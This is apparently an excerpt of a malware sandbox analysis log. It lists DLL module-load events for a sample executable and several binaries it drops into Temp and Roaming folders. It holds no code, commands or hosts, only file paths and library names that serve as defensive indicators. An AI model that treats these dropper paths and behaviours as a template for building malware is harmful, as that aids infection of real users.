                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: advpack.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeSection loaded: advpack.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: portabledeviceapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: pla.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: tdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: duilib_u.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: msvcp140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: duilib_u.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: msvcp140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: winhttp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: shfolder.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: riched20.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: usp10.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: msls31.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: bcp47langs.dll
